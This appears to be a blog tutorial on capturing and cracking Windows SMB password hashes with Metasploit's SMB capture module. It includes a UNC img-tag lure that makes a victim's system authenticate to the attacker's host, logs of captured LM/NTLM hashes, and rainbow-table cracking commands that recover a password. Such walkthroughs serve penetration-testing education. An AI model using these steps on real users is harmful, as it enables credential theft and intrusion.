The SMB Relay module is for doing just what it says, relaying the SMB session back to another host. It used to be the same host but now, post 08-068, you have to pick another system on the network. Doesn't matter what system, just not the same system. (I'll try to cover this in another blog post soon)
Additionally, the SMB Relay module provides a random challenge for each attempt and doesn't log those challenges anywhere that you could go back and use. So that pretty much rules out using the hashes you see in the output for password cracking.
For background it looks like this which looks just like the one that will work :-(
|[*] Received 192.168.0.103:2281 XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1|
So what are we to do? Use the SMB Sniffer module of course!
|The SMB sniffer module allows you to capture LM/NTLM hashes that can be cracked later. It uses a known challenge key which allows you to crack the hash offline.|
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > info
Name: Authentication Capture: SMB
Provided by: hdm
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.
We need to force a victim to authenticate to metasploit. The easiest way is to embed a UNC link into a webpage or email.
Example: img src="\\networkIP\share\1.gif"
Once the victim's browser tries to authenticate, the sniffer module will capture the hashes (which can be cracked later using rainbow tables). You'll notice the difference between this module and SMB Relay which issues a random challenge making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module, if you want to try to get a shell use the smb_relay exploit module.
|msf > use auxiliary/server/capture/smb|
msf auxiliary(smb) > run
[*] Auxiliary module running as background job
msf auxiliary(smb) >
[*] Server started.
[*] Captured 192.168.0.101:57794 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:44641 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:49777 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
We can now use HALFLM rainbow tables with the 1122334455667788 challenge to crack the first half of the password.
**We only take the first 16 characters of the LM hash output
We can then use rainbow tables to crack the first half:
|$ ./rcracki *.rti -h 76365e2d142b5612|
264241152 bytes read, disk access time: 4.97 s
verifying the file...
searching for 1 hash...
plaintext of 76365e2d142b5612 is PASSWOR
cryptanalysis time: 5.24 s
plaintext found: 1 of 1 (100.00%)
total disk access time: 4.97 s
total cryptanalysis time: 5.24 s
total chain walk step: 1783216
total false alarm: 591
total chain walk step due to false alarm: 703255
76365e2d142b5612 PASSWOR hex:50415353574f52
You will have to guess or bruteforce the rest :-( but thankfully there is a tool in your metasploit tools directory to help you do just that!
|$ ruby halflm_second.rb |
-h Display this help information
$ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR
[*] Trying one character...
[*] Cracked: PASSWORD